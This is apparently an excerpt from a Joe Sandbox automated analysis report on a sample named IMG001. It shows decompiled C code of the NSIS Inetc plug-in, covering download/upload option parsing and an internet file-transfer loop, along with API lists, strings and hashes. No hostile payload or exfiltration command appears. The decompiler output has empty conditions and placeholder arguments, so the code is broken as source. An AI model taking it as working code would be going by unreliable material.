								_t245 =  ==  ? "Inetc plug-in" : 0x73815828;
								SetDlgItemTextA(_t136, 0x3ee,  ==  ? "Inetc plug-in" : 0x73815828);
								L78:
								_t251 =  *0x73815ae0; // 0x0
								_t235 =  *0x73815ad9; // 0x1
								if(_t251 != 0) {
									_t54 =  *0x73815ad8; // 0x1
								} else {
									_t265 = 1;
									_t54 =  ==  ? _t265 :  *0x73815ad8 & 0x000000ff;
									 *0x73815ad8 = _t54;
								}
								if(_t54 != 0) {
									 *0x73815ada = 0;
									_t235 = 1;
									 *0x73815ad9 = 1;
								}
								if(_t235 == 0) {
									SetWindowLongA( *0x73815ae0, 0xfffffff0, GetWindowLongA(_t251, 0xfffffff0) | 0x04000000);
								}
								_t55 = GetTickCount();
								_push(0);
								 *0x73815acc = _t55;
								_t56 =  *0x73815ae0; // 0x0
								_push(E7381119C);
								_t57 =  !=  ? _t227 : _t56;
								_push( !=  ? _t227 : _t56);
								_t58 = 0x6e;
								_t252 = 0x65;
								_t59 =  !=  ? _t252 : _t58;
								_t60 = ( !=  ? _t252 : _t58) & 0x0000ffff;
								_t237 = 0x6c;
								_t61 =  !=  ? _t237 : ( !=  ? _t252 : _t58) & 0x0000ffff;
								_t62 = ( !=  ? _t237 : ( !=  ? _t252 : _t58) & 0x0000ffff) & 0x0000ffff;
								_t63 = CreateDialogParamA( *0x738156c4, ( !=  ? _t237 : ( !=  ? _t252 : _t58) & 0x0000ffff) & 0x0000ffff, ??, ??, ??); // executed
								 *0x73815ae4 = _t63;
								if(_t63 == 0) {
									 *0x73815ab4 = 7;
									_t64 = GetLastError();
									_t65 =  *0x73815ab4; // 0x4
									_t68 = lstrlenA((_t65 << 5) + 0x73815000);
									_t238 =  *0x73815ab4; // 0x4
									_t35 = _t68 + 0x73815000; // 0x4b4f
									_t70 = _t35 + (_t238 << 5);
									__eflags = _t70;
									wsprintfA(_t70, " (Err=%d)", _t64);
								} else {
									_t99 = CreateThread(0, 0, E73811657, _t63, 0,  &_a8); // executed
									_t231 = _t99;
									if(_t231 == 0) {
										 *0x73815ab4 = 0x14;
										DestroyWindow( *0x73815ae4);
										L112:
										do {
											L113:
										} while (E73813B5A( *0x738157cc) == 0 && lstrcmpiA( *0x738157cc, "/end") != 0);
										LocalFree( *0x738157cc);
										_t74 =  *0x738157d0; // 0x0
										if(_t74 != 0) {
											LocalFree(_t74);
											_t74 =  *0x738157d0; // 0x0
										}
										if( *0x738157dc != 0) {
											LocalFree(_t74);
										}
										_t75 =  *0x738157e0; // 0x0
										if(_t75 != 0) {
											LocalFree(_t75);
										}
										_t76 =  *0x738157d4; // 0x0
										if(_t76 != 0) {
											LocalFree(_t76);
										}
										_t77 =  *0x738157e4; // 0x0
										if(_t77 != 0) {
											LocalFree(_t77);
										}
										_t78 =  *0x738157d8; // 0x0
										if(_t78 != 0) {
											LocalFree(_t78);
										}
										_t79 =  *0x73815ab0; // 0x314c168
										 *0x738157e0 = 0;
										 *0x738157d0 = 0;
										 *0x738157d8 = 0;
										 *0x738157d4 = 0;
										 *0x738157cc = 0;
										 *0x738157e4 = 0;
										 *0x73815ae8 = 0;
										 *0x73815adf = 0;
										if(_t79 == 0) {
											L138:
											_t80 =  *0x73815ab4; // 0x4
											return E73813B9E((_t80 << 5) + 0x73815000);
										} else {
											_t319 =  *0x73815ab4; // 0x4
											if(_t319 != 0) {
												goto L138;
											}
											_t320 =  *0x73815abc; // 0x0
											if(_t320 <= 0) {
												L136:
												E73813B9E(_t79);
												L137:
												LocalFree( *0x73815ab0);
												 *0x73815ab0 =  *0x73815ab0 & 0x00000000;
												goto L138;
											}
											_t321 =  *0x73815ade; // 0x0
											if(_t321 == 0) {
												goto L136;
											}
											_t257 = WideCharToMultiByte(0, 0, _t79, 0xffffffff, 0, 0, 0, 0);
											if(_t257 > 0) {
												_t36 = _t257 + 1; // 0x1
												_t262 = LocalAlloc(0x40, _t36);
												if(_t262 != 0) {
													if(WideCharToMultiByte(0, 0,  *0x73815ab0, 0xffffffff, _t262, _t257, 0, 0) > 0) {
														E73813B9E(_t262);
													}
													LocalFree(_t262);
												}
											}
											goto L137;
										}
									}
									_t258 = GetDlgItem( *0x73815ae0, 0x403);
									_t102 = GetDlgItem( *0x73815ae0, 0x3f8);
									_a4 = _a4 & 0x00000000;
									_a12 = _a12 & 0x00000000;
									_t264 = _t102;
									if( *0x73815ad8 == 0) {
										ShowWindow( *0x73815ae4, 1);
										if( *0x73815ae0 != 0 &&  *0x73815ad9 == 0) {
											if(_t258 != 0) {
												_a4 = GetWindowLongA(_t258, 0xfffffff0);
												EnableWindow(_t258, 0);
											}
											if(_t264 != 0) {
												_a12 = IsWindowVisible(_t264);
												ShowWindow(_t264, 0);
											}
										}
									}
									while(IsWindow( *0x73815ae4) != 0) {
										_t106 = GetMessageA( &_v36, 0, 0, 0);
										__eflags = _t106;
										if(_t106 <= 0) {
											break;
										}
										_t117 = IsDialogMessageA( *0x73815ae4,  &_v36); // executed
										__eflags = _t117;
										if(_t117 == 0) {
											_t119 = IsDialogMessageA(_v0,  &_v36);
											__eflags = _t119;
											if(_t119 == 0) {
												_t121 = TranslateMessage( &_v36);
												__eflags = _t121;
												if(_t121 == 0) {
													DispatchMessageA( &_v36);
												}
											}
										}
									}
									if(WaitForSingleObject(_t231, 0xbb8) == 0x102) {
										TerminateThread(_t231, 1);
										 *0x73815ab4 = 6;
									}
									CloseHandle(_t231);
									if( *0x73815ad8 == 0) {
										_t109 =  *0x73815ae0; // 0x0
										if(_t109 != 0) {
											SetDlgItemTextA(_t109, 0x3ee, 0x73814150);
											if( *0x73815ad9 == 0) {
												if(_t258 != 0) {
													SetWindowLongA(_t258, 0xfffffff0, _a4);
												}
												if(_t264 != 0 && _a12 != 0) {
													ShowWindow(_t264, 5);
												}
											}
										}
									}
								}
								goto L112;
							}
						}
					}
					_t145 = lstrcmpiA(_t52, "/silent");
					__eflags = _t145;
					if(_t145 != 0) {
						_t146 = lstrcmpiA( *0x738157cc, "/caption");
						__eflags = _t146;
						if(_t146 != 0) {
							_t147 = lstrcmpiA( *0x738157cc, "/username");
							__eflags = _t147;
							if(_t147 != 0) {
								_t148 = lstrcmpiA( *0x738157cc, "/password");
								__eflags = _t148;
								if(_t148 != 0) {
									_t149 = lstrcmpiA( *0x738157cc, "/nocancel");
									__eflags = _t149;
									if(_t149 != 0) {
										_t150 = lstrcmpiA( *0x738157cc, "/nocookies");
										__eflags = _t150;
										if(_t150 != 0) {
											_t151 = lstrcmpiA( *0x738157cc, "/noproxy");
											__eflags = _t151;
											if(_t151 != 0) {
												_t152 = lstrcmpiA( *0x738157cc, "/popup");
												__eflags = _t152;
												if(_t152 != 0) {
													_t153 = lstrcmpiA( *0x738157cc, "/resume");
													__eflags = _t153;
													if(_t153 != 0) {
														_t154 = lstrcmpiA( *0x738157cc, "/translate");
														__eflags = _t154;
														if(_t154 != 0) {
															_t155 = lstrcmpiA( *0x738157cc, "/banner");
															__eflags = _t155;
															if(_t155 != 0) {
																_t156 = lstrcmpiA( *0x738157cc, "/canceltext");
																__eflags = _t156;
																if(_t156 != 0) {
																	_t157 = lstrcmpiA( *0x738157cc, "/question");
																	__eflags = _t157;
																	if(_t157 != 0) {
																		_t158 = lstrcmpiA( *0x738157cc, "/useragent");
																		__eflags = _t158;
																		if(_t158 != 0) {
																			_t159 = lstrcmpiA( *0x738157cc, "/proxy");
																			__eflags = _t159;
																			if(_t159 != 0) {
																				_t160 = lstrcmpiA( *0x738157cc, "/connecttimeout");
																				__eflags = _t160;
																				if(_t160 != 0) {
																					_t161 = lstrcmpiA( *0x738157cc, "/receivetimeout");
																					__eflags = _t161;
																					if(_t161 != 0) {
																						_t162 = lstrcmpiA( *0x738157cc, "/header");
																						__eflags = _t162;
																						if(_t162 != 0) {
																							__eflags =  *0x73815adf;
																							if( *0x73815adf != 0) {
																								L54:
																								_t163 = lstrcmpiA( *0x738157cc, "/file");
																								__eflags = _t163;
																								if(_t163 != 0) {
																									goto L63;
																								}
																								_t266 = CreateFileA( *0x738157e4, 0x80000000,  &(_t163->nLength), _t163, 3, _t163, _t163);
																								__eflags = _t266 - 0xffffffff;
																								if(_t266 == 0xffffffff) {
																									 *0x73815ab4 = 0xb;
																									goto L113;
																								}
																								_t166 = GetFileSize(_t266, 0);
																								 *0x73815aac = _t166;
																								__eflags = _t166;
																								if(_t166 == 0) {
																									L75:
																									CloseHandle(_t266);
																									 *0x73815ab4 = 0xd;
																									goto L113;
																								}
																								_t168 = E7381102E( *0x738157e4, 0x5c);
																								__eflags = _t168;
																								if(_t168 == 0) {
																									_t169 =  *0x738157e4; // 0x0
																								} else {
																									_t169 = E73811049( *0x738157e4, 0x5c) + 1;
																								}
																								wsprintfA(0x738159a8, "Filename: %s", _t169);
																								_t272 = _t272 + 0xc;
																								LocalFree( *0x738157e4);
																								_t172 = LocalAlloc(0x40,  *0x73815aac);
																								_t234 =  &_a4;
																								 *0x738157e4 = _t172;
																								_t173 = ReadFile(_t266, _t172,  *0x73815aac,  &_a4, 0);
																								__eflags = _t173;
																								if(_t173 == 0) {
																									goto L75;
																								} else {
																									__eflags = _a4 -  *0x73815aac; // 0x0
																									if(__eflags != 0) {
																										goto L75;
																									}
																									CloseHandle(_t266);
																									goto L63;
																								}
																							}
																							_t177 = lstrcmpiA( *0x738157cc, "/tostackconv");
																							asm("sbb al, al");
																							_t179 =  ~_t177 + 1;
																							__eflags = _t179;
																							 *0x73815ade = _t179;
																							if(_t179 != 0) {
																								L52:
																								_t180 = LocalAlloc(0x40, _t255); // executed
																								 *0x73815abc =  *0x73815abc & 0x00000000;
																								__eflags =  *0x73815abc;
																								_push("file");
																								 *0x73815ab0 = _t180;
																								_push(0x738156c8);
																								L53:
																								lstrcpyA();
																								goto L63;
																							}
																							_t182 = lstrcmpiA( *0x738157cc, "/tostack");
																							__eflags = _t182;
																							if(_t182 != 0) {
																								goto L54;
																							}
																							goto L52;
																						}
																						_t183 = LocalAlloc(0x40, _t255);
																						 *0x738157d8 = _t183;
																						goto L47;
																					}
																					E73813B5A( *0x738157cc);
																					 *0x73815ac8 = E73813B34( *0x738157cc) * 0x3e8;
																					goto L63;
																				}
																				E73813B5A( *0x738157cc);
																				 *0x73815ac4 = E73813B34( *0x738157cc) * 0x3e8;
																				goto L63;
																			}
																			 *0x738157d4 = LocalAlloc(0x40, _t255);
																			E73813B5A(_t191);
																			 *0x73815ad4 = 3;
																			goto L63;
																		}
																		_push("NSIS_Inetc (Mozilla)");
																		goto L48;
																	}
																	 *0x738157e0 = LocalAlloc(0x40, _t255);
																	E73813B5A(_t193);
																	_t195 =  *0x738157e0; // 0x0
																	__eflags =  *_t195;
																	if( *_t195 != 0) {
																		goto L63;
																	}
																	_push("Are you sure that you want to stop download?");
																	_push(_t195);
																	goto L53;
																}
																_push(0x738157e8);
																goto L48;
															}
															 *0x73815ad9 =  &(_t155->nLength);
															_t183 = LocalAlloc(0x40, _t255);
															 *0x738157dc = _t183;
															goto L47;
														}
														__eflags =  *0x73815ad9 - _t154;
														if( *0x73815ad9 == _t154) {
															E73813B5A("Downloading %s");
															E73813B5A("Connecting ...");
															E73813B5A("second");
															E73813B5A("minute");
															E73813B5A("hour");
															E73813B5A("s");
															_push("%dkB (%d%%) of %dkB @ %d.%01dkB/s");
														} else {
															E73813B5A(0x73815af0);
															E73813B5A("Downloading");
															E73813B5A("Connecting");
															lstrcpyA("Connecting", "Connecting");
															E73813B5A("Downloading %s");
															E73813B5A("Connecting ...");
															E73813B5A("%dkB (%d%%) of %dkB @ %d.%01dkB/s");
															_push("second");
														}
														E73813B5A();
														goto L48;
													}
													E73813B5A( *0x738157cc);
													_t212 = lstrlenA( *0x738157cc);
													__eflags = _t212;
													if(_t212 > 0) {
														lstrcpyA("Your internet connection seems to be not permitted or dropped out!\nPlease reconnect and click Retry to resume installation.",  *0x738157cc);
													}
													 *0x73815ada = 1;
													goto L63;
												} else {
													 *0x73815ad9 =  &(_t152->nLength);
													_t183 = LocalAlloc(0x40, _t255);
													 *0x738157d0 = _t183;
													goto L47;
												}
											} else {
												 *0x73815ad4 =  &(_t151->nLength);
												goto L63;
											}
										} else {
											 *0x73815add =  &(_t150->nLength);
											goto L63;
										}
									} else {
										 *0x73815adb =  &(_t149->nLength);
										goto L63;
									}
								} else {
									_t183 =  &_v100;
									goto L47;
								}
							} else {
								_t183 =  &_v164;
								L47:
								_push(_t183);
								goto L48;
							}
						} else {
							_push(0x73815828);
							L48:
							E73813B5A();
							goto L63;
						}
					} else {
						 *0x73815ad8 =  &(_t145->nLength);
						L63:
						_t51 = E73813B5A( *0x738157cc);
						continue;
					}
				}
				_t52 =  *0x738157cc; // 0x3146150
				goto L66;
			}

0x73813b11
0x73813b18
0x73813b28
0x73813b2e
0x73813029
0x7381302f
0x7381303b
0x7381303e
0x73813046
0x73813049
0x73813051
0x73813054
0x7381305f
0x73813065
0x7381306b
0x73813071
0x73813077
0x7381307d
0x73813083
0x73813089
0x7381308f
0x73813095
0x7381309a
0x738130a0
0x738130a6
0x738130ac
0x738130b2
0x738130b8
0x738130c4
0x738130c6
0x738130cc
0x738130d2
0x738130d5
0x738130e6
0x738130ee
0x738130f4
0x738130fa
0x738130fa
0x73813110
0x73813111
0x73813115
0x7381311b
0x738135d2
0x7381312b
0x73813130
0x73813133
0x738135df
0x738135e0
0x738135ec
0x738135f8
0x738135f8
0x738135fe
0x7381361f
0x73813625
0x7381363b
0x73813640
0x73813640
0x73813643
0x73813648
0x738136b4
0x738136b4
0x00000000
0x7381364a
0x73813654
0x7381365a
0x73813661
0x00000000
0x7381366c
0x7381367d
0x73813687
0x738136ba
0x738136ba
0x738136c0
0x738136c8
0x738136e0
0x738136ca
0x738136d5
0x738136d6
0x738136d9
0x738136d9
0x738136e7
0x738136eb
0x738136f2
0x738136f5
0x738136f5
0x738136fd
0x73813716
0x73813716
0x7381371c
0x73813728
0x7381372a
0x7381372f
0x73813734
0x7381373b
0x7381373e
0x73813741
0x73813744
0x73813745
0x73813751
0x73813754
0x73813755
0x73813758
0x73813762
0x73813768
0x7381376f
0x7381392d
0x73813937
0x7381393e
0x73813951
0x73813957
0x73813960
0x73813966
0x73813966
0x73813969
0x73813775
0x73813784
0x7381378a
0x7381378e
0x7381391b
0x73813925
0x73813972
0x73813978
0x73813978
0x73813983
0x7381399e
0x738139a4
0x738139ab
0x738139ae
0x738139b4
0x738139b4
0x738139c0
0x738139c3
0x738139c3
0x738139c9
0x738139d0
0x738139d3
0x738139d3
0x738139d9
0x738139e0
0x738139e3
0x738139e3
0x738139e9
0x738139f0
0x738139f3
0x738139f3
0x738139f9
0x73813a00
0x73813a03
0x73813a03
0x73813a09
0x73813a10
0x73813a16
0x73813a1c
0x73813a22
0x73813a28
0x73813a2e
0x73813a34
0x73813a3a
0x73813a42
0x73813ac3
0x73813ac3
0x73813ada
0x73813a44
0x73813a44
0x73813a4a
0x00000000
0x00000000
0x73813a4c
0x73813a52
0x73813aaa
0x73813aab
0x73813ab0
0x73813ab6
0x73813abc
0x00000000
0x73813abc
0x73813a54
0x73813a5a
0x00000000
0x00000000
0x73813a6d
0x73813a71
0x73813a73
0x73813a7f
0x73813a83
0x73813a99
0x73813a9c
0x73813a9c
0x73813aa2
0x73813aa2
0x73813a83
0x00000000
0x73813a71
0x73813a42
0x738137b2
0x738137b4
0x738137b6
0x738137ba
0x738137c5
0x738137c7
0x738137d7
0x738137e4
0x738137f9
0x73813807
0x7381380a
0x7381380a
0x73813812
0x7381381e
0x73813821
0x73813821
0x73813812
0x738137e4
0x73813879
0x73813832
0x73813838
0x7381383a
0x00000000
0x00000000
0x73813846
0x7381384c
0x7381384e
0x73813857
0x7381385d
0x7381385f
0x73813865
0x7381386b
0x7381386d
0x73813873
0x73813873
0x7381386d
0x7381385f
0x7381384e
0x7381389a
0x738138a1
0x738138a7
0x738138a7
0x738138b2
0x738138bf
0x738138c5
0x738138cc
0x738138dd
0x738138ea
0x738138f2
0x738138fa
0x738138fa
0x73813902
0x7381390d
0x7381390d
0x73813902
0x738138ea
0x738138cc
0x738138bf
0x00000000
0x7381376f
0x73813661
0x73813648
0x7381313f
0x73813141
0x73813143
0x7381315b
0x7381315d
0x7381315f
0x73813176
0x73813178
0x7381317a
0x73813192
0x73813194
0x73813196
0x738131ab
0x738131ad
0x738131af
0x738131c7
0x738131c9
0x738131cb
0x738131e3
0x738131e5
0x738131e7
0x738131ff
0x73813201
0x73813203
0x73813229
0x7381322b
0x7381322d
0x7381326f
0x73813271
0x73813273
0x7381332b
0x7381332d
0x7381332f
0x73813355
0x73813357
0x73813359
0x73813370
0x73813372
0x73813374
0x738133ae
0x738133b0
0x738133b2
0x738133c9
0x738133cb
0x738133cd
0x738133fd
0x738133ff
0x73813401
0x73813434
0x73813436
0x73813438
0x7381346b
0x7381346d
0x7381346f
0x7381348a
0x73813491
0x738134e4
0x738134ef
0x738134f1
0x738134f3
0x00000000
0x00000000
0x73813511
0x73813513
0x73813516
0x738136a5
0x00000000
0x738136a5
0x7381351f
0x73813525
0x7381352a
0x7381352c
0x7381368f
0x73813690
0x73813696
0x00000000
0x73813696
0x7381353a
0x73813541
0x73813543
0x73813557
0x73813545
0x73813554
0x73813554
0x73813567
0x7381356d
0x73813576
0x73813584
0x7381358c
0x73813596
0x7381359d
0x738135a3
0x738135a5
0x00000000
0x738135ab
0x738135ae
0x738135b4
0x00000000
0x00000000
0x738135bb
0x00000000
0x738135c1
0x738135a5
0x7381349e
0x738134a2
0x738134a4
0x738134a4
0x738134a6
0x738134ab
0x738134be
0x738134c1
0x738134c7
0x738134c7
0x738134ce
0x738134d3
0x738134d8
0x738134dd
0x738134dd
0x00000000
0x738134dd
0x738134b8
0x738134ba
0x738134bc
0x00000000
0x00000000
0x00000000
0x738134bc
0x73813474
0x7381347a
0x00000000
0x7381347a
0x73813440
0x73813456
0x00000000
0x73813456
0x73813409
0x7381341f
0x00000000
0x7381341f
0x738133d9
0x738133de
0x738133e3
0x00000000
0x738133e3
0x738133b4
0x00000000
0x738133b4
0x73813380
0x73813385
0x7381338a
0x7381338f
0x73813392
0x00000000
0x00000000
0x73813398
0x7381339d
0x00000000
0x7381339d
0x7381335b
0x00000000
0x7381335b
0x73813335
0x7381333a
0x73813340
0x00000000
0x73813340
0x73813279
0x7381327f
0x738132d5
0x738132df
0x738132e9
0x738132f3
0x738132fd
0x73813307
0x7381330c
0x73813281
0x73813286
0x73813290
0x7381329a
0x738132a9
0x738132b0
0x738132ba
0x738132c4
0x738132c9
0x738132c9
0x73813311
0x00000000
0x73813316
0x73813235
0x73813240
0x73813246
0x73813248
0x73813255
0x73813255
0x7381325a
0x00000000
0x73813205
0x73813209
0x7381320e
0x73813214
0x00000000
0x73813214
0x738131e9
0x738131ea
0x00000000
0x738131ea
0x738131cd
0x738131ce
0x00000000
0x738131ce
0x738131b1
0x738131b2
0x00000000
0x738131b2
0x73813198
0x73813198
0x00000000
0x73813198
0x7381317c
0x7381317c
0x7381347f
0x7381347f
0x00000000
0x7381347f
0x73813161
0x73813161
0x73813480
0x73813480
0x00000000
0x73813480
0x73813145
0x73813146
0x738135c7
0x738135cd
0x00000000
0x738135cd
0x73813143
0x738135da
0x00000000

APIs

lstrcpyA.KERNEL32(Downloading %s,Uploading %s), ref: 73813B18
lstrcpyA.KERNEL32(Downloading,Uploading), ref: 73813B28

Strings

Downloading %s, xrefs: 73813B0C
Downloading, xrefs: 73813B23
Uploading, xrefs: 73813B1E
Uploading %s, xrefs: 73813B07

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: lstrcpy
String ID: Downloading$Downloading %s$Uploading$Uploading %s
API String ID: 3722407311-2813864553
Opcode ID: 78ff6c9febebdd640a98cf325c86949f132fb54ef2077e22ada6ee91c41314bb
Instruction ID: fdd6e704e116285169850f51164a73069c074113956d2520b3834ead81a74683
Opcode Fuzzy Hash: 78ff6c9febebdd640a98cf325c86949f132fb54ef2077e22ada6ee91c41314bb
Instruction Fuzzy Hash: F1C012A2204656EEC36172DB9808F113B679704106B6C031CFABD1F247E7754570DA95

Uniqueness

Uniqueness Score: -1.00%

Function 00405C52, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C52(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405550(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E0040550E("*?|<>/\":", _t5))) == 0) {
							E00405688(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

APIs

CharNextA.USER32(?,*?|<>/":,00000000,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CAA
CharNextA.USER32(?,?,?,00000000), ref: 00405CB7
CharNextA.USER32(?,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CBC
CharPrevA.USER32(?,?,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CCC

Strings

*?|<>/":, xrefs: 00405C9A

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction ID: 7689e4b4801a359f66f53c78b0d93180a9ac7ee38d4886d9260c1dcf5575a0d1
Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction Fuzzy Hash: B311BF5180DB952EFB3216280C44B77BF99CB97B64F18487BE8C4722C2D67C5C429A6D

Uniqueness

Uniqueness Score: -1.00%

Function 7381148A, Relevance: 6.1, APIs: 4, Instructions: 111
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E7381148A(void* __ecx, void* _a4, void* _a8) {
				long _v8;
				long _v12;
				long _t22;
				long _t23;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				long _t36;
				struct _OVERLAPPED* _t37;
				long _t43;

				_v8 = 0;
				 *0x73815ab4 = 2;
				_t28 = 0xa;
				L1:
				while(1) {
					L1:
					if( *0x73815adf == 0) {
						_t22 = InternetReadFile(_a8, 0x73815c30, 0x2000,  &_v8);
						__eflags = _t22;
						if(_t22 == 0) {
							L26:
							 *0x73815ab4 = _t28;
						} else {
							_t23 = _v8;
							__eflags = _t23;
							if(_t23 == 0) {
								_t22 =  *0x73815ac0; // 0x0
								__eflags = _t22 - 0xffffffff;
								if(_t22 == 0xffffffff) {
									goto L21;
								} else {
									__eflags =  *0x73815ab8 - _t22; // 0x0
									if(__eflags >= 0) {
										goto L21;
									} else {
										goto L26;
									}
								}
							} else {
								_t43 =  *0x73815ab0; // 0x314c168
								__eflags = _t43;
								if(_t43 == 0) {
									_t22 = WriteFile(_a4, 0x73815c30, _t23,  &_v12, 0);
									__eflags = _t22;
									if(_t22 == 0) {
										L23:
										 *0x73815ab4 = 0xc;
									} else {
										_t22 = _v8;
										__eflags = _t22 - _v12;
										if(_t22 != _v12) {
											goto L23;
										} else {
											goto L18;
										}
									}
								} else {
									_t33 =  *0x73815abc; // 0x0
									_t37 = 0;
									__eflags = _t33 -  *0x73818c38;
									if(_t33 <  *0x73818c38) {
										while(1) {
											__eflags = _t37 - _t23;
											if(_t37 >= _t23) {
												goto L18;
											}
											_t14 = _t37 + 0x73815c30; // 0x0
											 *((char*)(_t33 + _t43)) =  *_t14;
											_t34 =  *0x73815abc; // 0x0
											_t22 = _v8;
											_t37 =  &(_t37->Internal);
											_t33 = _t34 + 1;
											 *0x73815abc = _t33;
											__eflags = _t33 -  *0x73818c38;
											if(_t33 <  *0x73818c38) {
												_t43 =  *0x73815ab0; // 0x314c168
												continue;
											}
											goto L18;
										}
									}
									L18:
									 *0x73815ab8 =  *0x73815ab8 + _t22;
									__eflags =  *0x73815ab8;
									goto L19;
								}
							}
						}
					} else {
						_v8 = 0x2000;
						_t22 = ReadFile(_a4, 0x73815c30, 0x2000,  &_v12, 0);
						if(_t22 == 0) {
							 *0x73815ab4 = 0xd;
						} else {
							_t22 = _v12;
							if(_t22 == 0) {
								L21:
								 *0x73815ab4 = 0;
							} else {
								while(1) {
									_t22 = InternetWriteFile(_a8, 0x73815c30, _t22,  &_v8);
									if(_t22 == 0) {
										break;
									}
									_t36 = _v8;
									if(_t36 == 0) {
										break;
									} else {
										 *0x73815ab8 =  *0x73815ab8 + _t36;
										_t22 = _v12 - _t36;
										_v12 = _t22;
										if(_t22 != 0) {
											continue;
										} else {
										}
									}
									L19:
									if( *0x73815ab4 == 2) {
										goto L1;
									}
									goto L27;
								}
								 *0x73815ab4 = _t28;
								goto L19;
							}
						}
					}
					L27:
					return _t22;
				}
			}

0x73811496
0x73811499
0x738114a3
0x00000000
0x738114a4
0x738114a4
0x738114b0
0x73811527
0x7381152d
0x7381152f
0x738115ee
0x738115ee
0x73811535
0x73811535
0x73811538
0x7381153a
0x738115dc
0x738115e1
0x738115e4
0x00000000
0x738115e6
0x738115e6
0x738115ec
0x00000000
0x00000000
0x00000000
0x00000000
0x738115ec
0x73811540
0x73811540
0x73811546
0x73811548
0x73811596
0x7381159c
0x7381159e
0x738115d0
0x738115d0
0x738115a0
0x738115a0
0x738115a3
0x738115a6
0x00000000
0x00000000
0x00000000
0x00000000
0x738115a6
0x7381154a
0x7381154a
0x73811550
0x73811552
0x73811558
0x7381155a
0x7381155a
0x7381155c
0x00000000
0x00000000
0x7381155e
0x73811564
0x73811567
0x7381156d
0x73811570
0x73811571
0x73811572
0x73811578
0x7381157e
0x73811580
0x00000000
0x73811580
0x00000000
0x7381157e
0x7381155a
0x738115a8
0x738115a8
0x738115a8
0x00000000
0x738115a8
0x73811548
0x7381153a
0x738114b2
0x738114c0
0x738114c3
0x738114cb
0x738115c4
0x738114d1
0x738114d1
0x738114d6
0x738115bc
0x738115bc
0x738114dc
0x738114dc
0x738114e9
0x738114f1
0x00000000
0x00000000
0x738114f3
0x738114f8
0x00000000
0x738114fa
0x738114fd
0x73811503
0x73811505
0x73811508
0x00000000
0x00000000
0x7381150a
0x73811508
0x738115ae
0x738115b5
0x00000000
0x738115b7
0x00000000
0x738115b5
0x7381150f
0x00000000
0x7381150f
0x738114d6
0x738114cb
0x738115f4
0x738115f8
0x738115f8

APIs

ReadFile.KERNEL32(00000000,73815C30,00002000,00000000,00000000,?,?,?,73811B6F,00000000,00000000), ref: 738114C3
InternetWriteFile.WININET(73811B6F,73815C30,00000000,00000000), ref: 738114E9
InternetReadFile.WININET(73811B6F,73815C30,00002000,00000000), ref: 73811527
WriteFile.KERNEL32(00000000,73815C30,00000000,00000000,00000000,?,?,?,73811B6F,00000000,00000000), ref: 73811596

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: File$InternetReadWrite
String ID:
API String ID: 1380539803-0
